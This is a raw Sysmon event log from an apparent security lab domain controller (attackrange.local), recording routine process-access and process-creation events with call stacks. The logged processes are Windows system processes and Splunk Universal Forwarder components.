16:03:07.906{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029430Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:07.906{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029429Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:07.906{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029428Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:07.906{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-543B-6008-B606-00000000A301}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029427Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:07.906{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-543B-6008-B606-00000000A301}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029426Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:07.907{7901BC46-543B-6008-B606-00000000A301}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000029425Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:07.234{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-543B-6008-B506-00000000A301}5792C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029424Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:07.234{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029423Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:07.234{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029422Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:07.234{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029421Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:07.234{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029420Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:07.234{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-543B-6008-B506-00000000A301}5792C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029419Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:07.234{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-543B-6008-B506-00000000A301}5792C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029418Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:07.235{7901BC46-543B-6008-B506-00000000A301}5792C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000029442Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:08.578{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-543C-6008-B706-00000000A301}1348C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029441Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:08.578{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029440Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:08.578{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029439Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:08.578{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029438Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:08.578{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029437Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:08.578{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-543C-6008-B706-00000000A301}1348C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029436Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:08.578{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-543C-6008-B706-00000000A301}1348C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029435Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:08.579{7901BC46-543C-6008-B706-00000000A301}1348C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000029434Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:08.047{7901BC46-543B-6008-B606-00000000A301}51763108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029451Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:09.672{7901BC46-543D-6008-B806-00000000A301}70445084C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029450Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:09.531{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-543D-6008-B806-00000000A301}7044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029449Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:09.531{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029448Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:09.531{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029447Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:09.531{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029446Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 